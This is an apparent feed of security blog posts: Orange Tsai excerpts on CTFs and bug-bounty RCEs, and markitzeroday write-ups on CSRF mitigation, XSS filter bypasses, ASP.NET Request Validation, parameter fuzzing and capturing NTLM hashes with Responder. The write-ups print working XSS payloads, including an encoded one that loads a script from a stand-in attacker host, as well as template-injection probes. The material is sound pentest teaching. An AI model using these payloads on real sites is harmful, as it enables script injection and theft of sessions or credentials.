✇ Orange

Remote Code Execution through GDB Remote Debugging Protocol

By: [email protected] (Orange Tsai)
A little toy I thought up while preparing for DEFCON CTF. When using GDB remote debugging, many people bind the port to 0.0.0.0 for convenient remote access, which lets an attacker connect and do a few things. As for what exactly can be done: it's no fun without remote code execution XD Most of the work is based on the article Turning arbitrary GDBserver sessions into RCE; my changes add ARM and x64 support and tidy up the code a bit... XD The tricky part is that after extended-remote, GDB's default target architecture is i386, so things fail when the remote architecture is not x86; you have to specify the architecture with set architecture (the original article worked entirely on x86, so it never hit this XD). But before run, there is no way to know which architecture the target is running on
✇ Orange

AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)

By: [email protected] (Orange Tsai)
A challenge I made for the AIS3 Final CTF. It was relatively hard for a beginner-oriented competition, but the ideas behind it are interesting: everything is handed to you, yet the hole is nowhere to be found, and once someone explains it you get that sudden "why didn't I think of that" feeling. In web attacks and penetration testing, your thinking often shouldn't be too proper or too direct; it has to be a bit crooked, a bit "sneaky" XD This is a pure code-review challenge, so straight to the code (you can try to find the hole yourself first XD). Vulnerability 1: Race Condition. Newly registered users are all put into the locks table and locked, but if you log in during registration, before the account has been added to the locks table (lines 111 & 112), the login-time check on whether the account is locked can be bypassed! Vulnerability 2: one-byte off SQL
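The race window around lines 111 & 112 can be modelled deterministically in a few lines. All names below are illustrative; they are not taken from the actual challenge source:

```python
# Toy model of the race: registration first creates the user row, then,
# a moment later, inserts the lock row. A login that lands in between
# passes the "is this account locked?" check.
users, locks = set(), set()

def register_step1(username):   # user row created (around line 111)
    users.add(username)

def register_step2(username):   # lock row created (around line 112)
    locks.add(username)

def login(username):
    return username in users and username not in locks

register_step1("attacker")
won_race = login("attacker")    # True: logged in inside the window
register_step2("attacker")
late_login = login("attacker")  # False: the lock row now exists
```

In the real challenge the two steps are separated by ordinary execution time rather than an explicit pause, which is exactly what makes the window exploitable by a fast concurrent login.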
✇ Orange

Google & Facebook Bug Bounty GET

By: [email protected] (Orange Tsai)
To be clear, this post is pure bragging xD Back in 2013, when Yahoo started its Bug Bounty, I jumped on the trend and reported two vulnerabilities to Yahoo: Yahoo Bug Bounty Part 1 - an arbitrary file download in the Taiwan Yahoo Blog, and Yahoo Bug Bounty Part 2 - remote code execution on *.login.yahoo.com. And then nothing. After that I turned into a pro-gamer playing CTFs. Until the middle of this year, when I decided I should at least get my name on the vulnerability halls of fame of a few big companies, and started digging again. Actually getting down to it, though, things have changed a lot: the easy-to-find, high-severity bugs have all been taken. It feels like the blue-ocean era of bug hunting is over; these days a bounty hunter can only dig at small front-end and design flaws, and there's not much money in it XD I spent some time surveying vulnerabilities disclosed over the years and various front-end attack techniques, and found a CSRF on an official Google site leading to personal information
✇ Orange

HITCON CTF 2015 Quals & Final 心得備份

By: [email protected] (Orange Tsai)
It seems I never kept a draft and only published this on Facebook and WooYun. Waking up today I saw people re-sharing it again, so I figured I'd keep a backup XD Facebook link / WooYun knowledge base link / HITCON KnowledgeBase link ---------- For the final's Attack & Defense I also made a Web challenge. 0ops member 5alt wrote a note on it, HITCON CTF 2015 Final Webful Writeup; really well written XD It made me itch to write one myself explaining why each hole was designed the way it was XD My intent when writing the final was to simulate a real-world environment, so that the usual web-dog "sneaky" tricks would feel right at home instead of being puzzle-style techniques useless in practice. Besides the interplay between the various API endpoints (one point compromised = everything compromised), it also simulated the use of Discuz UC_KEY and the various ways a leaked SECRET_KEY can be exploited, while also preventing replay
✇ Orange

Uber 遠端代碼執行- Uber.com Remote Code Execution via Flask Jinja2 Template Injection

By: [email protected] (Orange Tsai)
Long time no post XD A few days ago, Uber announced its bug bounty program. On HackerOne the rewards looked decent; even the lowest tier, XSS / CSRF, starts at US$3,000, so I jumped in to see what fun there was XD From the officially published technical details, Uber's main site is built on Python Flask and NodeJS, so while hunting I naturally focused on testing vulnerabilities in those two frameworks! When you perform actions such as changing your phone number or name, Uber notifies you of the account change by email and SMS. After one such action I noticed the email Uber sent looked like the image below. Why is there an extra "2" in the name? XDDDD Tracing it back, the entry point was Riders.uber.com, the place where you edit your profile and view bills and trips. In the name field, I had used the payload {{ 1+1 }}
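To see why {{ 1+1 }} rendering as 2 signals template injection, here is a deliberately naive toy renderer (pure Python, not Jinja2) that evaluates whatever appears between the braces, which is in essence what a vulnerable template evaluation does with user-supplied input:

```python
import re

# Toy renderer: eval()s whatever appears between {{ }}. Real engines
# like Jinja2 are far richer, but the probe logic is the same: if
# "{{ 1+1 }}" comes back as "2", expressions are being evaluated
# server-side on your input.
def toy_render(template):
    return re.sub(r"\{\{(.*?)\}\}",
                  lambda m: str(eval(m.group(1))),  # the injection point
                  template)

rendered = toy_render("Orange {{ 1+1 }}")  # -> "Orange 2"
```

In a real engine the same foothold is then escalated from arithmetic to attribute and method access, which is how template injection turns into code execution.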
✇ Orange

How I Hacked Facebook, and Found Someone's Backdoor Script

By: [email protected] (Orange Tsai)
At long last, here it is XD How I Hacked Facebook, and Found Someone's Backdoor Script (English version) / 滲透 Facebook 的思路與發現 (Chinese version). Looks like one more Google RCE and I'll have the complete RCE collection across the big companies XD
✇ Orange

HITCON 2016 投影片 - Bug Bounty 獎金獵人甘苦談 那些年我回報過的漏洞

By: [email protected] (Orange Tsai)
This is my talk on being a bug bounty hunter, given at HITCON Community 2016. It shared some of my views on finding bugs along with some case studies: Facebook Remote Code Execution (more details), Uber Remote Code Execution (more details), developer.apple.com Remote Code Execution, abs.apple.com Remote Code Execution, b.login.yahoo.com Remote Code Execution (more details), eBay SQL Injection
✇ Orange

Collection of CTF Web Challenges I made

By: [email protected] (Orange Tsai)
I've put all the CTF Web challenges I've made up on GitHub, including source code, solutions, the techniques involved, and write-ups scattered around the web. This is the repository of CTF Web challenges I made. It contains the challenges' source code, solutions, write-ups and some explanations of the ideas. Hope you will like it :) https://github.com/orangetw/My-CTF-Web-Challenges
✇ Orange

[隨筆] Java Web 漏洞生態食物鏈

By: [email protected] (Orange Tsai)
This post was originally going to be titled "Notes on setting the HITCON CTF 2016 Quals challenges", but it sat around for two months, so instead I'm writing about some Java-related things XD As a preface: around May or June this year, I saw how a once widely used but nearly unmaintained Java Web framework patched a vulnerability, felt the fix still left room to work with, so I started reading the source to hunt 0-days and, along the way, organized the Java Web vulnerability ecosystem; I found it interesting. In my public talks I usually divide Web security into three worlds: the File-Based world, where one file maps to one entry point, as in classic ASP, PHP, ASPX; the Route-Based world, where one route maps to a set of functions (features), as in Rails, NodeJS, Django; and the Java world, which is so complex that it forms a category of its own. Of course the three are not mutually exclusive; for example, a common PHP MVC app uses Rewrite to map
✇ Orange

GitHub Enterprise SQL Injection

By: [email protected] (Orange Tsai)
Before

GitHub Enterprise is the on-premises version of GitHub.com, which lets you deploy a whole GitHub service in your private network for business use. You can get a 45-day free trial and download the VM from enterprise.github.com. After you deploy it, you will see something like below: Now I have the whole GitHub environment in a VM. That's interesting, so I decided to look deeper into the VM :P
✇ markitzeroday.com

CSRF Mitigation for AJAX Requests

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm, whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do, POSTing the values toAccount=1234 and amount=100, transferring £100 to the attacker's account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made; the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn't need to. The request has been made, and because the user is logged into the bank and therefore has a session cookie, that session cookie has been passed to the bank site, authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure and HttpOnly flags to show that these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing it server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included by the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.
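A minimal sketch of that pattern in Python; the function names and the dict standing in for server-side session storage are illustrative, not any particular framework's API:

```python
import hmac
import secrets

# Minimal Synchronizer Token Pattern sketch. The token is stored
# server-side in the session and embedded in the page (hidden field or
# JS variable); it is never sent as a cookie, so a cross-site request
# cannot include it automatically.
def issue_token(session):
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def check_token(session, submitted):
    expected = session.get("csrf_token", "")
    # constant-time comparison avoids leaking the token byte by byte
    return bool(expected) and hmac.compare_digest(expected, submitted)

session = {}
token = issue_token(session)
assert check_token(session, token)          # genuine form post
assert not check_token(session, "forged")   # cross-site forgery fails
```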

But what if there was another way? One little-known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application, e.g. X-Requested-With: XMLHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XMLHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.
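Steps 2-4 can be sketched as a tiny check function; this is a hypothetical helper, not any framework's built-in, and note that jQuery spells the value it sends XMLHttpRequest:

```python
# Sketch of a check a server-side handler could call before any
# state-changing action (framework wiring omitted). HTTP header names
# are case-insensitive, so normalise them before comparing.
def csrf_check(headers):
    normalised = {k.lower(): v for k, v in headers.items()}
    return normalised.get("x-requested-with") == "XMLHttpRequest"

assert csrf_check({"X-Requested-With": "XMLHttpRequest"})
assert not csrf_check({"Content-Type": "application/json"})  # 403 + log
```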

Many JavaScript frameworks such as jQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So, referring to the above, old browsers couldn’t make cross-domain AJAX requests at all. Therefore, you may find an old website that checks for a custom header server-side so that it knows the request is an AJAX request. Now, the web is developed on the basis of “no breaking changes”: any new technology introduced into the browser should not force websites to update themselves in order to continue working (why not visit the World Wide Web, apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1: CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each other’s responses, e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell, CORS does not prevent anything that was previously possible from happening. For example, a cross-domain POST using <form method="post"> has always been allowed, so CORS allows any AJAX request that results in a previously possible HTTP request to be made without a preflight request; allowing AJAX to do this as well does not introduce any extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS-aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.
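The server side of that preflight decision can be sketched as follows; the allowed origin and header sets are illustrative, not from any real deployment:

```python
# Sketch of a CORS-aware server answering the OPTIONS preflight.
ALLOWED_ORIGINS = {"https://example.org"}
ALLOWED_HEADERS = {"x-requested-with"}

def preflight(origin, access_control_request_headers):
    # header names in Access-Control-Request-Headers are case-insensitive
    wanted = {h.strip().lower()
              for h in access_control_request_headers.split(",")}
    if origin in ALLOWED_ORIGINS and wanted <= ALLOWED_HEADERS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Headers": ", ".join(sorted(wanted))}
    return None  # no CORS headers: the browser blocks the real request
```

With these sets, a preflight from https://attacker-site.co.uk gets no CORS headers back, so the browser never sends the header-bearing POST.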

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application verifies that the custom header X-Requested-With was received in the request. As a pentester you should verify that all potentially discovered CSRF vulnerabilities are actually exploitable. Burp Suite allows this via right-clicking an item then clicking Engagement tools > Create CSRF PoC. This may result in two things:

  1. If you weren’t aware of the above, you may find a POST request that at first appeared vulnerable to CSRF (due to no tokens) but isn’t, due to header checking.
  2. If, after having read this post, you find that an AJAX request is sending X-Requested-With: XMLHttpRequest, you may find that removing this header still causes the “unsafe” action to take place server-side; in that case the request is vulnerable.

What To Do As A Developer

This may be a good shortcut if your server-side language of choice does not support server-side variables, or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application, i.e. the “unsafe” requests as defined by the RFC.

Remember, this only works for AJAX requests. If your application has to fall-back to full HTML requests if JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy-to-implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not those of the victim as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom header to be added to a cross-domain request to a second attacker-controlled domain that set crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any request, even those that are write-only, such as CSRF. The trick was for the attacker to issue a 307 HTTP redirect from their second domain to the victim website; the bug in Flash carried the custom header over from the original request. However, as Flash is moribund, and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. If the risk appetite for the application in question is low, though, go with token mitigation instead of, or as well as, the header check: defence in depth.

Note that the Flash bug was fixed back in 2015.

✇ markitzeroday.com

XSS Without Dots

A site that I discovered was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer to use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert
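Both decoding layers used above can be sanity-checked with Python's standard library; note that urllib's quote emits uppercase hex, which is equivalent to the lowercase %3b shown earlier:

```python
import html
from urllib.parse import quote

# Layer 1: the browser HTML-decodes the attribute value, so &#46; is "."
assert html.unescape("attacker-site&#46;co&#46;uk") == "attacker-site.co.uk"

# Layer 2: percent-encoding the entity to survive transport in the URL
assert quote("&#46;", safe="") == "%26%2346%3B"
```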

✇ Orange

How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!

By: [email protected] (Orange Tsai)
Hi, it’s been a long time since my last blog post. In the past few months, I spent lots of time preparing for my talk at Black Hat USA 2017 and DEF CON 25. Being a Black Hat and DEFCON speaker has long been one of my life goals, and this was also my first English talk at such formal conferences. It was a really memorable experience :P Thanks to the review boards for the acceptance. This post is a simple case
✇ markitzeroday.com

ASP.NET Request Validation Bypass

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML-encoded. For example, unless the developer manually output-encodes the data in the following example, XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in an “A potentially dangerous Request.QueryString value was detected from the client” error, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. I originally thought it required IE9 standards mode rather than quirks mode; edit: it works in either mode, however if the page is in quirks mode then it requires user interaction (like a mouseover). For example, the existing page can be seen to be in quirks mode as it contains the following type definition and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately it is not enough to bypass Request Validation in itself as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application is vulnerable should it also use data from other sources. e.g. User input from a database shared with a non ASP.NET app, or an app that is written properly as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them chance to fix it first, even if this is only client-side validation. Also any automated processes that may include <stuff that it POSTs or GETs to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS is an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site because your risk appetite is low, then do validate user input. Don’t let non-alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding: the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page, as the browser won’t execute it, and therefore no XSS.
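As an illustration of output encoding (Python's stdlib is used here purely as a neutral sketch, since the article's context is .NET), one call turns metacharacters into entities:

```python
import html

# Output encoding in one line: HTML metacharacters become entities, so
# the browser renders the input as text instead of executing it as markup.
user_input = '<svg onload="alert(1)" />'
safe = html.escape(user_input)
assert safe == '&lt;svg onload=&quot;alert(1)&quot; /&gt;'
```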

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML-encode everywhere (don’t output into JavaScript directly; just don’t). If you need “extra” security, prevent non-alphanumerics from being inserted into fields yourself through server-side validation.

✇ Orange

PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF

By: [email protected] (Orange Tsai)
Author: Orange Tsai (@orange_8361) from DEVCORE. Recently, I reviewed several web frameworks and language implementations and found some vulnerabilities. This is a simple and interesting case, and it seems easy to exploit in the real world! Affected versions: PHP 5 < 5.6.33, PHP 7.0 < 7.0.27, PHP 7.1 < 7.1.13, PHP 7.2 < 7.2.1. Vulnerability details: the vulnerability is in the file ext/gd/
✇ markitzeroday.com

Hidden XSS

On a web test once I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$ curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53 bytes. From there, we can configure wfuzz to try different parameter names and look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369

Well, whaddya know, looks like we’ve found the parameter!
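The size-based filtering that wfuzz's --hh 53 flag performs can be sketched in a few lines; the parameter names and lengths below are made up for illustration:

```python
# Keep only candidate parameters whose response length differs from the
# baseline (wfuzz's --hh hides responses matching the given char count).
def interesting(baseline_length, results):
    return [param for param, length in results.items()
            if length != baseline_length]

assert interesting(53, {"id": 53, "page": 53, "item": 84}) == ["item"]
```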

Will Smith

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss

✇ markitzeroday.com

How to Use X-XSS-Protection for Evil

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well, browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to prevent reflected XSS from firing. The first header controls that behaviour within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically, as long as the policy does not allow unsafe-inline, JavaScript injected into the page will not execute, which can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here; detailed information regarding the header can be found here.

What I wanted to show you was the difference between specifying block, and either not including the header at all (which therefore will take on the setting in the browser) or specifying 1 without block. Also, for good measure I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you a way that if a site has specified X-XSS-Protection without block, how this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work from Firefox, as at the time of writing Firefox doesn’t include any XSS auditor and is therefore very open to reflected XSS should the visited site be vulnerable. There is the add-on NoScript that you can use to protect yourself, should Firefox be your browser of choice. The following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URL:

abused source code

Of course, editing their own link is fruitless; they would have to pass the link on to their victim(s) in some way, by sending it via email, Facebook, Skype, etc.

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So, in summary, it is always good to specify block, as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers, we can either specify the script’s SHA-256 hash in our CSP, or simply move our code to a separate .js file, as long as we whitelist 'self' in our policy. Any attacker injecting inline script will be foiled. Of course, the problem with Content Security Policy is that it still seems to be an afterthought, and trying to come up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy, though, may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.
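For reference, a CSP sha256- source value is just the Base64 of the SHA-256 digest of the exact inline script body; a quick sketch of how to compute one (Python used as a neutral illustration):

```python
import base64
import hashlib

# CSP hash-source: Base64(SHA-256(script body)), whitespace included,
# wrapped in single quotes and prefixed with the algorithm name.
def csp_hash(script_body):
    digest = hashlib.sha256(script_body.encode()).digest()
    return "'sha256-" + base64.b64encode(digest).decode() + "'"

value = csp_hash('document.write("one potato")')
# usable as: Content-Security-Policy: script-src 'self' <value>
```

Note the hash must be recomputed whenever the inline script changes by even one character, which is part of why a separate whitelisted .js file is often the easier route.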

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

✇ markitzeroday.com

Gaining Domain Admin from Outside Active Directory

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test I undertook some years back. This client’s network is a tough nut to crack, and one I’ve tested before, so I was somewhat apprehensive about going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

responder

Note, of course, that I would never reveal client-confidential information on my blog; everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with CrackMapExec (other tools are available), we can tell whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call was to try to crack this hash and recover the plaintext password. Hashcat was loaded with rockyou.txt and a rule set, and quickly cracked the password.

